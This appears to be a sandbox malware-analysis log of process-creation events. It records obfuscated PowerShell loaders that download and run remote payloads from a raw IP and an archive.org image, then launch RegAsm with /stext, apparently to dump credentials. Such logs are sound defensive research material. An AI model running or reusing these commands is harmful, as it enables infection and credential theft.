                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.recsrn/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"Jump to behavior
